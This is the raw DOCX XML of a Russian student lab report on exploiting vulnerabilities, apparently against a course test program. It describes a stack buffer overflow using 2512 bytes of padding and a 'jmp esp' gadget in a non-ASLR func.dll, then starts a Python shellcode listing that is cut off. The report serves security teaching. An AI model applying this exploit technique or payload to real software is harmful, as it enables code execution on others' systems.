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051E2728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</w:t>
      </w:r>
      <w:r w:rsidR="00DE36B0" w:rsidRPr="00DE36B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> и высшего образования</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE36B0"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3B8ED4C3" w14:textId="51F9F7BA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 xml:space="preserve">Институт </w:t>
      </w:r>
      <w:r w:rsidR="00E06CB4" w:rsidRPr="00DE36B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>компьютерных наук и кибербезопасности</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7185055E" w14:textId="51F06700" w:rsidR="00F446FF" w:rsidRPr="00DE36B0" w:rsidRDefault="00BB673D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</w:t>
      </w:r>
      <w:r w:rsidR="00DE36B0" w:rsidRPr="00DE36B0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> школа 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5C5B1798" w:rsidR="00F446FF" w:rsidRPr="00FF1575" w:rsidRDefault="00E96E98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</w:rPr>
        <w:t>Лабораторная работа</w:t>
      </w:r>
      <w:r w:rsidR="00F446FF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> № </w:t>
      </w:r>
      <w:r w:rsidR="00FF1575">
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2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46D0D505" w:rsidR="00F446FF" w:rsidRPr="003D1D31" w:rsidRDefault="00E96E98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 xml:space="preserve">Вариант </w:t>
      </w:r>
      <w:r w:rsidR="00475C02">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="003D1D31">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5488EC6B" w14:textId="77777777" w:rsidR="003D1D31" w:rsidRPr="003D1D31" w:rsidRDefault="003D1D31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</w:p>
    <w:p w14:paraId="0E9F6011" w14:textId="09053160" w:rsidR="00F446FF" w:rsidRPr="003D1D31" w:rsidRDefault="003D1D31" w:rsidP="00FF1575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FF1575">
        <w:t>Исследование подходов, применяемых при эксплуатации уязвимостей</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C64EC79" w14:textId="77777777" w:rsidR="003D1D31" w:rsidRPr="003D1D31" w:rsidRDefault="003D1D31" w:rsidP="003D1D31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</w:p>
    <w:p w14:paraId="13353649" w14:textId="19C6723E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3D1D31">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Модели Безопасности Компьютерных Сетей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24D56D6E" w14:textId="77777777" w:rsidR="00F446FF" w:rsidRDefault="00F446FF" w:rsidP="00FF1575">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AC89656" w14:textId="77777777" w:rsidR="00F446FF" w:rsidRDefault="00F446FF" w:rsidP="00BD4AE8">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3C14A5" w14:textId="77777777" w:rsidR="00F446FF" w:rsidRDefault="00F446FF" w:rsidP="00F446FF">
      <w:pPr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1307241C" w:rsidR="00F446FF" w:rsidRDefault="00F446FF" w:rsidP="00F446F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</w:t>
      </w:r>
      <w:r w:rsidR="008C5E25">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51717">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>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66E2DE8" w:rsidR="00F446FF" w:rsidRDefault="00F446FF" w:rsidP="00F446FF">
      <w:pPr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7BE4195C" w14:textId="52348A14" w:rsidR="00BD4AE8" w:rsidRDefault="00BD4AE8" w:rsidP="00F446FF">
      <w:pPr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</w:p>
    <w:p w14:paraId="24DEE051" w14:textId="1E63D1A3" w:rsidR="00F446FF" w:rsidRDefault="00F446FF" w:rsidP="00BD4AE8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3960"/>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="-218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3D1D31">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Жуковский Е.В</w:t>
      </w:r>
      <w:r w:rsidR="00A51717">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3428F4" w14:textId="44BB7E6E" w:rsidR="00F446FF" w:rsidRPr="003D1D31" w:rsidRDefault="00F446FF" w:rsidP="003D1D31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01B4AE78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3D1D31">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06745404" w14:textId="1E92DB29" w:rsidR="00FB69F8" w:rsidRDefault="00FB69F8" w:rsidP="003D1D31">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="240"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Цель работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C08BE2F" w14:textId="00BF14C1" w:rsidR="00C717BB" w:rsidRDefault="00FF1575" w:rsidP="003D1D31">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Изучение способов эксплуатации уязвимостей и механизмов противодействия.</w:t>
      </w:r>
      <w:r w:rsidR="00C717BB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18000F04" w14:textId="16715494" w:rsidR="00FB69F8" w:rsidRPr="00FB69F8" w:rsidRDefault="00FB69F8" w:rsidP="00FB69F8">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Основная часть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0917E" w14:textId="0BA24AE2" w:rsidR="00C059E1" w:rsidRPr="00FF1575" w:rsidRDefault="00FF1575" w:rsidP="0040431E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="240"/>
        <w:ind w:left="567" w:firstLine="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>П</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1575">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>еречень динамических библиотек, не использующих рандомизацию адресов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C922E4" w14:textId="77777777" w:rsidR="00996027" w:rsidRPr="00996027" w:rsidRDefault="00996027" w:rsidP="003C1975">
      <w:pPr>
        <w:keepNext/>
        <w:suppressAutoHyphens/>
        <w:ind w:left="1134" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BACE3EC" wp14:editId="12B0AEA7">
            <wp:extent cx="5940425" cy="1969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7D8A" w14:textId="4F5F4BD8" w:rsidR="00FF1575" w:rsidRPr="00996027" w:rsidRDefault="00996027" w:rsidP="00996027">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EC5762">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A75400">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A75400">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>все динамические библиотеки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2811AF62" w14:textId="77777777" w:rsidR="00996027" w:rsidRDefault="00996027" w:rsidP="003C1975">
      <w:pPr>
        <w:keepNext/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1494" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1ABA1BAD" wp14:editId="70C479A9">
            <wp:extent cx="5940425" cy="15271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2C79" w14:textId="787FF186" w:rsidR="00FF1575" w:rsidRPr="00996027" w:rsidRDefault="00996027" w:rsidP="00996027">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EC5762">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00996027">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - библиотека со статическими адресами</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BC48EA" w14:textId="566E4B14" w:rsidR="00996027" w:rsidRDefault="00A75400" w:rsidP="00A75400">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:jc w:val="left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Описание эксплуатирования уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC4758D" w14:textId="1C05DDDC" w:rsidR="007B041B" w:rsidRPr="007B041B" w:rsidRDefault="00A75400" w:rsidP="00A75400">
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1134" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Так как существует библиотека со статическими адресами, то на них можно сослаться из исполняемого кода. </w:t>
      </w:r>
      <w:r w:rsidR="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">В этой библиотеке есть уязвимая конструкция </w:t>
      </w:r>
      <w:r w:rsidR="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidR="006005A4" w:rsidRPr="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidR="006005A4" w:rsidRPr="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">которая позволит исполнять код на стеке. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Как известно из лабораторной работы 1, в программе есть уязвимость переполнения буфера. Для начала нужно определить, сколько нужно полезной нагрузки, то есть размер буфера, который требуется превысить. </w:t>
      </w:r>
      <w:r w:rsidR="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2508+4 =2512. Создаем </w:t>
      </w:r>
      <w:r w:rsidR="007B041B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>заглушку с помощью</w:t>
      </w:r>
      <w:r w:rsidR="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="006005A4" w:rsidRPr="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:r w:rsidR="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="006005A4" w:rsidRPr="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”*2512.</w:t>
      </w:r>
      <w:r w:rsidR="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Далее пишется адрес </w:t>
      </w:r>
      <w:r w:rsidR="007B041B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">конструкции </w:t>
      </w:r>
      <w:r w:rsidR="007B041B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidR="007B041B" w:rsidRPr="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B041B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidR="007B041B" w:rsidRPr="006005A4">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="007B041B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> которая находится в </w:t>
      </w:r>
      <w:r w:rsidR="007B041B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r w:rsidR="007B041B" w:rsidRPr="007B041B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007B041B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r w:rsidR="007B041B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Итого, </w:t>
      </w:r>
      <w:r w:rsidR="007B041B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eip</w:t>
      </w:r>
      <w:r w:rsidR="007B041B" w:rsidRPr="007B041B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B041B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>перемещается на стек и возможно выполнить полезную нагрузку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4341C4BB" w14:textId="77777777" w:rsidR="00CF73B4" w:rsidRDefault="007B041B" w:rsidP="003C1975">
      <w:pPr>
        <w:keepNext/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1134" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04A28F53" wp14:editId="12179935">
            <wp:extent cx="4044362" cy="35656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801" cy="35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219E" w14:textId="139D54E9" w:rsidR="00A75400" w:rsidRPr="003C1975" w:rsidRDefault="00CF73B4" w:rsidP="003C1975">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EC5762">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r w:rsidRPr="00611EDD">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">15 </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">файл в </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1975">
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE5A8C3" w14:textId="60F75310" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Код полезной нагрузки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406E8A5C" w14:textId="4B4A1C38" w:rsidR="007A1356" w:rsidRPr="007A1356" w:rsidRDefault="007A1356" w:rsidP="007A1356">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:before="240"/>
        <w:ind w:left="1494" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1356">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75295CD8" wp14:editId="4EDBB5C4">
                <wp:extent cx="5655734" cy="3318934"/>
                <wp:effectExtent l="0" t="0" r="21590" b="15240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5734" cy="33189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71FA6" w14:textId="77777777" w:rsidR="00A75863" w:rsidRDefault="007A1356" w:rsidP="007A1356">
                            <w:pPr>
                              <w:pStyle w:val="a6"/>
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="007A1356">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t xml:space="preserve"># Шелл-код </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3C2377D5" w14:textId="77777777" w:rsidR="00A75863" w:rsidRDefault="00A75863" w:rsidP="007A1356">
                            <w:pPr>
                              <w:pStyle w:val="a6"/>
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="147EEBBA" w14:textId="2265F2E1" w:rsidR="007A1356" w:rsidRPr="00BD4AE8" w:rsidRDefault="007A1356" w:rsidP="007A1356">
                            <w:pPr>
                              <w:pStyle w:val="a6"/>
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>shell</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> = 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"\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31\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xc</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>9\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xf</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>7\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xe</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00BD4AE8">
                              <w:rPr>
                                <w:lang w:val="ru-RU"/>
                              </w:rPr>
                              <w:t>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14\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xad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96\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xad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10\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01\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xda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01\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xda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20\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01\</w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A1356">
                              <w:t>xde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31\</w:t>
                            </w:r>
